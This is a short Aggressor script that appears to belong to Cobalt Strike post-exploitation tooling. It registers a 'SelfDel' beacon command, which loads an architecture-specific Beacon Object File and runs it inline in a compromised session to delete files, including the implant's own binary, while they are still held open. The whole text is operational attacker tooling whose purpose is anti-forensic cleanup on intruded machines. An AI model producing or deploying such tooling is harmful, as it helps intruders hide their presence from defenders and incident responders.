beacon_command_register(
    "SelfDel", "Delete files regardless of handle occupation.",
    "\nDelete files regardless of handle occupation via SetFileInformationByHandle.\n\n".
    "USAGE:\nSelfDel <self / path to file>\n\n");

alias SelfDel {

    local('$barch $handle $data $args');

    # figure out the arch of this session
    $barch  = barch($1);

    # Read in the right BOF file
    $handle = openf(script_resource("bofSelfDel. $+ $barch $+ .obj"));
    $data   = readb($handle, -1);
    closef($handle);

    # Pack our arguments
    $bid = $1;
    $path = $2;
    $arg_data  = bof_pack($bid, "Z", $path);

    blog($bid, "Tasked to Delete file..");
    beacon_inline_execute($bid, $data, "go", $arg_data);
}